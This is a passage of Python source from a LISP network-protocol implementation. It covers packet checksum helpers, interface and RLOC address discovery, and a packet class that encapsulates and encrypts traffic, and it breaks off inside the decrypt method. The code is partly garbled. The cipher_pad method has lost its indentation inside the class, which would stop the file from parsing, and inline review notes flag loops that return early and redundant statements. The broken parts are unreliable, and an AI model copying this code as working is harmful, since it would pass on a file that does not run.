def lisp_get_data_nonce():
    """Return a random 24-bit nonce for the LISP data header."""
    return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
    """Return a random 64-bit nonce for LISP control packets."""
    max_nonce = (2**64) - 1
    return(random.randint(0, max_nonce))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
    """Return the hex digits of an integer without the leading "0x".

    Python 2 longs append a trailing "L" to hex() output; strip it.
    """
    digits = hex(integer_value)[2::]
    if (digits.endswith("L")): digits = digits[:-1]
    return(digits)
#enddef
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
    """Return the current time in seconds since the epoch."""
    now = time.time()
    return(now)
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
    """Return a timestamp 'seconds' into the future."""
    return(seconds + time.time())
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
    """Render the time elapsed since timestamp 'ts' (a time.time() value)
    as "h:mm:ss", or "never" for an unset timestamp."""
    if (ts == None or ts == 0): return("never")
    seconds = round(time.time() - ts, 0)
    return(str(datetime.timedelta(seconds=seconds)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
    """Render the time remaining until timestamp 'ts' as "h:mm:ss",
    "never" when unset (0), or "expired" when 'ts' has passed."""
    if (ts == 0): return("never")
    remaining = ts - time.time()
    if (remaining < 0): return("expired")
    remaining = round(remaining, 0)
    return(str(datetime.timedelta(seconds=remaining)))
#enddef
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
    """Return a printable EID string.

    Produces "[<iid>]<eid>/<ml>" for unicast, "[<iid>](*, <group>)" when
    there is no source EID (or source equals group), and the (S, G) form
    otherwise. 'eid' and 'group' are lisp_address() instances.
    """
    eid_str = eid.print_prefix()
    if (group.is_null()): return(eid_str)
    group_str = group.print_prefix()
    if (eid.is_null() or eid.is_exact_match(group)):
        bracket = group_str.find("]") + 1
        return("[{}](*, {})".format(group.instance_id, group_str[bracket::]))
    #endif
    return(eid.print_sg(group))
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it an IPv4 address.
#
def lisp_convert_6to4(addr_str):
    """Strip the IPv6-mapped "::ffff:" prefix (used on the udp46 tunnel)
    to recover the plain IPv4 address; other strings pass through."""
    if ("::ffff:" not in addr_str): return(addr_str)
    return(addr_str.split(":")[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
    """Return a lisp_address() suitable for sending on a udp46 socket.

    IPv6 address strings pass through unchanged; IPv4 strings are first
    wrapped in the IPv4-compatible "::ffff:" form.
    """
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)):
        addr_str = "::ffff:" + addr_str
    #endif
    addr.store_address(addr_str)
    return(addr)
#enddef
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
    """Resolve 'string' to an address string.

    Strings that already look like IPv4, IPv6, or MAC addresses are
    returned as-is; anything else is treated as a DNS name. Returns ""
    when resolution fails.
    """
    ipv4 = string.split(".")
    ipv6 = string.split(":")
    mac = string.split("-")
    # Dotted string starting with a decimal number: assume IPv4 address.
    if (len(ipv4) > 1):
        if (ipv4[0].isdigit()): return(string)
    #endif
    # Colon-separated string starting with hex digits: assume IPv6.
    if (len(ipv6) > 1):
        try:
            int(ipv6[0], 16)
            return(string)
        except:
            pass
        #endtry
    #endif
    #
    # Make sure there are hex digits between dashes, otherwise could be a
    # valid DNS name with dashes.
    #
    # NOTE(review): the result of this loop is never used — control falls
    # through to DNS resolution whether or not the fields parse as hex.
    # Confirm whether a MAC string was meant to be returned here.
    if (len(mac) == 3):
        for i in range(3):
            try: int(mac[i], 16)
            except: break
        #endfor
    #endif
    try:
        addr = socket.gethostbyname(string)
        return(addr)
    except:
        if (lisp_is_alpine() == False): return("")
    #endtry
    #
    # Try different approach on Alpine.
    #
    # gethostbyname() may not return DNS names on Alpine (musl libc);
    # fall back to getaddrinfo() and verify the canonical name matches.
    try:
        addr = socket.getaddrinfo(string, 0)[0]
        if (addr[3] != string): return("")
        addr = addr[4][0]
    except:
        addr = ""
    #endtry
    return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data, hdrlen=20):
    """Compute the IPv4 header checksum over 'data' and return the header
    with the checksum spliced in at byte offsets 10-11.

    'data' is a packed header of at least 'hdrlen' bytes whose checksum
    field should be zero on entry. Too-short buffers are logged and
    returned unmodified.
    """
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return(data)
    #endif
    hex_hdr = binascii.hexlify(data)
    #
    # Sum the header 16 bits (4 hex digits) at a time so carries only
    # need folding once.
    #
    csum = 0
    for i in range(0, hdrlen*2, 4):
        csum += int(hex_hdr[i:i+4], 16)
    #endfor
    #
    # Fold the carries, take the one's complement, and byte-swap the
    # result into network order.
    #
    csum = (csum >> 16) + (csum & 0xffff)
    csum += csum >> 16
    csum = socket.htons(~csum & 0xffff)
    #
    # Splice the packed 2-byte checksum in at byte offsets 10 and 11.
    #
    packed = struct.pack("H", csum)
    return(data[0:10] + packed + data[12::])
#enddef
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too Big message. It will statically
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
    """Compute the checksum of a 36-byte ICMP Destination Unreachable
    (Too Big) message and return it with the checksum at byte offsets 2-3.

    'data' must be at least 36 bytes (8-byte ICMP header plus the
    offending IP header and 8 bytes of its payload) with a zeroed
    checksum field on entry; shorter buffers are logged and returned
    unmodified.
    """
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return(data)
    #endif
    icmp = binascii.hexlify(data)
    #
    # Go 2-bytes (4 hex digits) at a time so we only have to fold the
    # carry-over once. Per RFC 792 the checksum covers the entire ICMP
    # message: all 36 bytes, i.e. 72 hex digits. (The previous loop bound
    # of 36 summed only the first 18 bytes, producing a bad checksum.)
    #
    checksum = 0
    for i in range(0, 72, 4):
        checksum += int(icmp[i:i+4], 16)
    #endfor
    #
    # Add in carry and byte-swap.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)
    #
    # Pack in 2-byte buffer and insert at bytes 2 and 3.
    #
    checksum = struct.pack("H", checksum)
    icmp = data[0:2] + checksum + data[4::]
    return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
    """Compute the IPv6 pseudo-header UDP checksum for 'data'.

    'source' and 'dest' are IPv6 address strings and 'data' is a UDP
    packet starting with its header, checksum field zeroed. Returns the
    packet with the computed checksum in the last 2 header bytes.
    """
    #
    # Build the IPv6 pseudo-header: source, dest, length, next-header.
    #
    src = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    dst = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    length = socket.htonl(len(data))
    next_hdr = socket.htonl(LISP_UDP_PROTOCOL)
    pseudo = src.pack_address()
    pseudo += dst.pack_address()
    pseudo += struct.pack("II", length, next_hdr)
    #
    # Checksum runs over pseudo-header plus packet; pad the hex string
    # out to a 16-bit (4 hex digit) boundary.
    #
    udp = binascii.hexlify(pseudo + data)
    udp += "0" * (len(udp) % 4)
    #
    # Sum 16 bits at a time so carries only need folding once.
    #
    csum = 0
    for i in range(0, len(udp), 4):
        csum += int(udp[i:i+4], 16)
    #endfor
    #
    # Fold carries, complement, and byte-swap into network order.
    #
    csum = (csum >> 16) + (csum & 0xffff)
    csum += csum >> 16
    csum = socket.htons(~csum & 0xffff)
    #
    # Store the checksum in the last 2 bytes of the UDP header.
    #
    packed = struct.pack("H", csum)
    return(data[0:6] + packed + data[8::])
#enddef
#
# lisp_igmp_checksum
#
# Compute IGMP checksum. This is specialized for an IGMP query 12-byte
# header.
#
def lisp_igmp_checksum(igmp):
    # Hex string of the 12-byte IGMP query header (24 hex characters).
    g = binascii.hexlify(igmp)
    #
    # Go 2-bytes at a time so we only have to fold carry-over once.
    #
    checksum = 0
    for i in range(0, 24, 4):
        checksum += int(g[i:i+4], 16)
    #endfor
    #
    # Add in carry and byte-swap.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)
    #
    # Pack in 2-byte buffer and insert at bytes 2 and 3, the IGMP header
    # checksum field.
    #
    checksum = struct.pack("H", checksum)
    igmp = igmp[0:2] + checksum + igmp[4::]
    return(igmp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
    #
    # Check for illegal device name.
    #
    if (device not in netifaces.interfaces()): return(None)
    #
    # Check if there are no IPv4 addresses assigned to interface.
    #
    addresses = netifaces.ifaddresses(device)
    if (addresses.has_key(netifaces.AF_INET) == False): return(None)
    #
    # Find first private address. NOTE(review): the loop returns on its
    # first iteration, so the FIRST IPv4 address is returned whether or
    # not it is private -- confirm that is the intent.
    #
    return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    for addr in addresses[netifaces.AF_INET]:
        addr_str = addr["addr"]
        return_address.store_address(addr_str)
        return(return_address)
    #endfor
    return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
    # First 12 bytes of the frame are dest-MAC then source-MAC. Format as
    # a hex string with spaces removed so the MACs can be used as
    # lisp_mymacs{} dictionary keys.
    macs = lisp_format_packet(packet[0:12]).replace(" ", "")
    da = macs[0:12]
    sa = macs[12::]
    # lisp_mymacs may not be populated yet, hence the try/except.
    try: my_sa = lisp_mymacs.has_key(sa)
    except: my_sa = False
    if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
    if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
    # Neither MAC is ours -- return unknown-interface marker.
    return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
    #
    # Create a lisp_interface() for every device reported by the netifaces
    # API and register each one in the lisp.myinterfaces{} dictionary.
    #
    for dev in netifaces.interfaces():
        lisp_interface(dev).add_interface()
    #endfor
    return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
    #
    # Walk the IPv4 addresses assigned to device "lo" and return the first
    # one that is not 127.0.0.1. Return None when only 127.0.0.1 exists.
    #
    for entry in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
        peer = entry["peer"]
        if (peer != "127.0.0.1"): return(peer)
    #endfor
    return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
    #
    # Return True when the supplied string is in "xxxx-xxxx-xxxx" form.
    # A mask suffix is allowed, e.g. "xxxx-xxxx-xxxx/48", in which case
    # only the part before the "/" is examined.
    #
    parts = mac_str.split("/")
    candidate = parts[0] if (len(parts) == 2) else mac_str
    return(len(candidate) == 14 and candidate.count("-") == 2)
#enddef
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
    #
    # Walk all interfaces, and for each ethernet interface, put the MAC
    # address as a key into lisp_mymacs with a value of an array of
    # interface names that have the MAC assigned.
    #
    for device in netifaces.interfaces():
        #
        # Ignore bogus interface names that containers may create. Allow
        # interface names with colons, dashes and alphanumeric characters.
        # Bug fix: the second replace() must chain off 'd', not 'device',
        # otherwise the colon removal is discarded and legitimate names
        # like "eth0:1" are rejected by the isalnum() test below.
        #
        d = device.replace(":", "")
        d = d.replace("-", "")
        if (d.isalnum() == False): continue
        #
        # Need this for EOS because a "pimreg" interface will crash the call
        # to netifaces.ifaddresses("pimreg").
        #
        try:
            parms = netifaces.ifaddresses(device)
        except:
            continue
        #endtry
        if (parms.has_key(netifaces.AF_LINK) == False): continue
        mac = parms[netifaces.AF_LINK][0]["addr"]
        mac = mac.replace(":", "")
        #
        # GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
        # them.
        #
        if (len(mac) < 12): continue
        if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
        lisp_mymacs[mac].append(device)
    #endfor
    lprint("Local MACs are: {}".format(lisp_mymacs))
    return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
    #
    # Find the egress device from the default route, then return the first
    # IPv4 address configured on it as a lisp_address. Returns an
    # unspecified ("") lisp_address when nothing is found.
    #
    out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
    if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
    #
    # Get last item on first line of output.
    #
    out = out.split("\n")[0]
    device = out.split()[-1]
    addr = ""
    macos = lisp_is_macos()
    if (macos):
        out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
    else:
        cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
        out = commands.getoutput(cmd)
        if (out == ""):
            # Fall back to a global address on the loopback device.
            cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
            out = commands.getoutput(cmd)
        #endif
        if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
    #endif
    #
    # Check for multi-line. And favor returning private address so NAT
    # traversal is used in lig. NOTE(review): the loop below returns on its
    # first iteration, so only the first address is ever considered and the
    # "favor private" behavior described here is not actually implemented.
    #
    addr = ""
    out = out.split("\n")
    for line in out:
        a = line.split()[1]
        if (macos == False): a = a.split("/")[0]
        address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
        return(address)
    #endfor
    return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#enddef
#
# lisp_get_local_addresses
#
# Use netifaces module to get a IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
    global lisp_myrlocs
    #
    # Check to see if we should not get the first address. Use environment
    # variable (1-based addressing) to determine which one to get. If the
    # number of addresses are less than the index, use the last one.
    #
    # The format of the environment variable could be <number> or
    # <device>:<number>. The format could also be "<device>:" but make sure
    # the user typed in a ":".
    #
    device_select = None
    index = 1
    parm = os.getenv("LISP_ADDR_SELECT")
    if (parm != None and parm != ""):
        parm = parm.split(":")
        if (len(parm) == 2):
            device_select = parm[0]
            index = parm[1]
        else:
            if (parm[0].isdigit()):
                index = parm[0]
            else:
                device_select = parm[0]
            #endif
        #endif
        # "<device>:" form leaves index as the empty string -- default to 1.
        index = 1 if (index == "") else int(index)
    #endif
    # rlocs[0] is the IPv4 RLOC, rlocs[1] the IPv6 RLOC, rlocs[2] the
    # device name they were found on.
    rlocs = [None, None, None]
    rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    device_iid = None
    for device in netifaces.interfaces():
        if (device_select != None and device_select != device): continue
        addresses = netifaces.ifaddresses(device)
        if (addresses == {}): continue
        #
        # Set instance-ID for interface.
        #
        device_iid = lisp_get_interface_instance_id(device, None)
        #
        # Look for a non-link-local and non-loopback address.
        #
        if (addresses.has_key(netifaces.AF_INET)):
            ipv4 = addresses[netifaces.AF_INET]
            count = 0
            for addr in ipv4:
                rloc4.store_address(addr["addr"])
                if (rloc4.is_ipv4_loopback()): continue
                if (rloc4.is_ipv4_link_local()): continue
                if (rloc4.address == 0): continue
                count += 1
                rloc4.instance_id = device_iid
                # Skip addresses that are EIDs in the local database-mapping
                # unless the user explicitly selected this device.
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
                rlocs[0] = rloc4
                if (count == index): break
            #endfor
        #endif
        if (addresses.has_key(netifaces.AF_INET6)):
            ipv6 = addresses[netifaces.AF_INET6]
            count = 0
            for addr in ipv6:
                addr_str = addr["addr"]
                rloc6.store_address(addr_str)
                if (rloc6.is_ipv6_string_link_local(addr_str)): continue
                if (rloc6.is_ipv6_loopback()): continue
                count += 1
                rloc6.instance_id = device_iid
                if (device_select == None and
                    lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
                rlocs[1] = rloc6
                if (count == index): break
            #endfor
        #endif
        #
        # Did we find an address? If not, loop and get the next interface.
        #
        if (rlocs[0] == None): continue
        rlocs[2] = device
        break
    #endfor
    addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
    addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
    device = rlocs[2] if rlocs[2] else "none"
    device_select = " (user selected)" if device_select != None else ""
    addr1 = red(addr1, False)
    addr2 = red(addr2, False)
    device = bold(device, False)
    lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
        format(addr1, addr2, device, device_select, device_iid))
    lisp_myrlocs = rlocs
    return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
    #
    # Return a list of every local IPv4 and IPv6 address known to the
    # kernel, excluding loopback and IPv6 link-local addresses. Used for
    # building pcap and iptables filters.
    #
    addresses = []
    for device in netifaces.interfaces():
        try:
            ifa = netifaces.ifaddresses(device)
        except:
            continue
        #endtry
        for entry in ifa.get(netifaces.AF_INET, []):
            address = entry["addr"]
            if (address.find("127.0.0.1") != -1): continue
            addresses.append(address)
        #endfor
        for entry in ifa.get(netifaces.AF_INET6, []):
            address = entry["addr"]
            if (address == "::1"): continue
            if (address[0:5] == "fe80:"): continue
            addresses.append(address)
        #endfor
    #endfor
    return(addresses)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
#
def lisp_get_all_multicast_rles():
    #
    # Grep lisp.config for every configured multicast RLE address.
    # Returns a (possibly empty) list of dotted-decimal address strings.
    #
    rles = []
    out = commands.getoutput('egrep "rle-address =" ./lisp.config')
    if (out == ""): return(rles)
    for line in out.split("\n"):
        if (line[0] == "#"): continue
        address = line.split("rle-address = ")[1]
        first_byte = int(address.split(".")[0])
        # Keep only addresses in the multicast range 224.0.0.0 - 239.x.x.x.
        if (224 <= first_byte < 240): rles.append(address)
    #endfor
    return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
    def __init__(self, packet):
        # Outer (encapsulation) IP header state.
        self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.outer_tos = 0
        self.outer_ttl = 0
        # Outer UDP header state (ports/lengths in host byte order).
        self.udp_sport = 0
        self.udp_dport = 0
        self.udp_length = 0
        self.udp_checksum = 0
        # Inner (original) IP header state.
        self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.inner_tos = 0
        self.inner_ttl = 0
        self.inner_protocol = 0
        self.inner_sport = 0
        self.inner_dport = 0
        # LISP data header and the raw packet buffer being processed.
        self.lisp_header = lisp_data_header()
        self.packet = packet
        # IP version numbers (4 or 6) of inner/outer headers, 0 = unknown.
        self.inner_version = 0
        self.outer_version = 0
        # UDP destination port used when encapsulating.
        self.encap_port = LISP_DATA_PORT
        self.inner_is_fragment = False
        # Reason string of the last decode/decap error, "" when none.
        self.packet_error = ""
        self.gleaned_dest = False
    #enddef
    def encode(self, nonce):
        #
        # Prepend LISP, UDP, and outer IP headers onto self.packet for
        # encapsulation. Returns self, or None when there is no usable
        # source RLOC or the outer version is unknown.
        #
        # We could be running with no RLOCs found. If lisp_myrlocs[] is None,
        # then self.outer_source will be LISP_AFI_NONE.
        #
        if (self.outer_source.is_null()): return(None)
        #
        # We have to build the LISP header here because if we are doing
        # lisp-crypto, the ICV covers the LISP header. The function
        # lisp_packet.encrypt() will put in the key-id.
        #
        if (nonce == None):
            self.lisp_header.nonce(lisp_get_data_nonce())
        elif (self.lisp_header.is_request_nonce(nonce)):
            self.lisp_header.request_nonce(nonce)
        else:
            self.lisp_header.nonce(nonce)
        #endif
        self.lisp_header.instance_id(self.inner_dest.instance_id)
        #
        # Encrypt the packet. If something went wrong, send unencrypted packet
        # by telling RLOC with key-id 0. For now, just use key-id 1. We are
        # supporting just a single key.
        #
        self.lisp_header.key_id(0)
        control = (self.lisp_header.get_instance_id() == 0xffffff)
        if (lisp_data_plane_security and control == False):
            addr_str = self.outer_dest.print_address_no_iid() + ":" + \
                str(self.encap_port)
            if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
                keys = lisp_crypto_keys_by_rloc_encap[addr_str]
                if (keys[1]):
                    keys[1].use_count += 1
                    packet, encrypted = self.encrypt(keys[1], addr_str)
                    if (encrypted): self.packet = packet
                #endif
            #endif
        #endif
        #
        # Start with UDP header. Call hash_packet() to set source-port value.
        # Unless we are doing lisp-crypto and nat-traversal.
        #
        self.udp_checksum = 0
        if (self.encap_port == LISP_DATA_PORT):
            if (lisp_crypto_ephem_port == None):
                if (self.gleaned_dest):
                    self.udp_sport = LISP_DATA_PORT
                else:
                    self.hash_packet()
                #endif
            else:
                self.udp_sport = lisp_crypto_ephem_port
            #endif
        else:
            self.udp_sport = LISP_DATA_PORT
        #endif
        self.udp_dport = self.encap_port
        self.udp_length = len(self.packet) + 16
        #
        # IPv6 raw sockets need to have the UDP ports not swapped.
        #
        if (self.outer_version == 4):
            sport = socket.htons(self.udp_sport)
            dport = socket.htons(self.udp_dport)
        else:
            sport = self.udp_sport
            dport = self.udp_dport
        #endif
        # NOTE(review): this statement recomputes 'dport' to the same value
        # the if/else above just assigned -- it appears to be redundant.
        dport = socket.htons(self.udp_dport) if self.outer_version == 4 else \
            self.udp_dport
        udp = struct.pack("HHHH", sport, dport, socket.htons(self.udp_length),
            self.udp_checksum)
        #
        # Encode the LISP header.
        #
        lisp = self.lisp_header.encode()
        #
        # Now prepend all 3 headers, LISP, UDP, outer header. See lisp_packet.
        # fix_outer_header() for byte-swap details for the frag-offset field.
        #
        if (self.outer_version == 4):
            tl = socket.htons(self.udp_length + 20)
            frag = socket.htons(0x4000)
            outer = struct.pack("BBHHHBBH", 0x45, self.outer_tos, tl, 0xdfdf,
                frag, self.outer_ttl, 17, 0)
            outer += self.outer_source.pack_address()
            outer += self.outer_dest.pack_address()
            outer = lisp_ip_checksum(outer)
        elif (self.outer_version == 6):
            # No outer IPv6 header is built here; historic code kept below.
            outer = ""
            # short = 6 << 12
            # short |= self.outer_tos << 4
            # short = socket.htons(short)
            # tl = socket.htons(self.udp_length)
            # outer = struct.pack("HHHBB", short, 0, tl, 17, self.outer_ttl)
            # outer += self.outer_source.pack_address()
            # outer += self.outer_dest.pack_address()
        else:
            return(None)
        #endif
        self.packet = outer + udp + lisp + self.packet
        return(self)
    #enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
    def encrypt(self, key, addr_str):
        #
        # Encrypt self.packet with the supplied lisp-crypto key. Returns
        # [buffer, did-encrypt]; when no key or shared-secret is available
        # the original packet is returned with did-encrypt False.
        #
        if (key == None or key.shared_key == None):
            return([self.packet, False])
        #endif
        #
        # Pad packet to multiple of 16 bytes and call AES cipher.
        #
        packet = self.cipher_pad(self.packet)
        iv = key.get_iv()
        ts = lisp_get_timestamp()
        aead = None
        if (key.cipher_suite == LISP_CS_25519_CHACHA):
            encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
        elif (key.cipher_suite == LISP_CS_25519_GCM):
            k = binascii.unhexlify(key.encrypt_key)
            try:
                aesgcm = AES.new(k, AES.MODE_GCM, iv)
                encrypt = aesgcm.encrypt
                aead = aesgcm.digest
            except:
                lprint("You need AES-GCM, do a 'pip install pycryptodome'")
                return([self.packet, False])
            #endtry
        else:
            k = binascii.unhexlify(key.encrypt_key)
            encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
        #endif
        ciphertext = encrypt(packet)
        if (ciphertext == None): return([self.packet, False])
        # Microsecond fraction of elapsed time, used only in the log below.
        ts = int(str(time.time() - ts).split(".")[1][0:6])
        #
        # GCM requires 16 bytes of an AEAD MAC tag at the end of the
        # ciphertext. Needed to interoperate with the Go implementation of
        # AES-GCM. The MAC digest was computed above.
        #
        if (aead != None): ciphertext += aead()
        #
        # Compute ICV and append to packet. ICV covers the LISP header, the
        # IV, and the ciphertext.
        #
        self.lisp_header.key_id(key.key_id)
        lisp = self.lisp_header.encode()
        icv = key.do_icv(lisp + iv + ciphertext, iv)
        ps = 4 if (key.do_poly) else 8
        string = bold("Encrypt", False)
        cipher_str = bold(key.cipher_suite_string, False)
        addr_str = "RLOC: " + red(addr_str, False)
        auth = "poly" if key.do_poly else "sha256"
        auth = bold(auth, False)
        icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
        dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
            string, key.key_id, addr_str, icv_str, cipher_str, ts))
        # Pack the hex ICV string into network byte order: 16 bytes for
        # poly1305, 20 bytes for sha256-based ICVs.
        icv = int(icv, 16)
        if (key.do_poly):
            icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
            icv2 = byte_swap_64(icv & LISP_8_64_MASK)
            icv = struct.pack("QQ", icv1, icv2)
        else:
            icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
            icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
            icv3 = socket.htonl(icv & 0xffffffff)
            icv = struct.pack("QQI", icv1, icv2, icv3)
        #endif
        return([iv + ciphertext + icv, True])
    #enddef
    def decrypt(self, packet, header_length, key, addr_str):
        #
        # Authenticate and decrypt an encapsulated payload. Returns
        # [plaintext, True] on success or [None, False] on ICV or cipher
        # failure (self.packet_error records the reason).
        #
        # Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
        # truncate packet to run hash over. Compare packet hash with computed
        # hash.
        #
        if (key.do_poly):
            # Poly1305 ICV is the trailing 16 bytes (32 hex characters).
            icv1, icv2 = struct.unpack("QQ", packet[-16::])
            packet_icv = byte_swap_64(icv1) << 64
            packet_icv |= byte_swap_64(icv2)
            packet_icv = lisp_hex_string(packet_icv).zfill(32)
            packet = packet[0:-16]
            ps = 4
            hash_str = bold("poly", False)
        else:
            # Sha256-based ICV is the trailing 20 bytes (40 hex characters).
            icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
            packet_icv = byte_swap_64(icv1) << 96
            packet_icv |= byte_swap_64(icv2) << 32
            packet_icv |= socket.htonl(icv3)
            packet_icv = lisp_hex_string(packet_icv).zfill(40)
            packet = packet[0:-20]
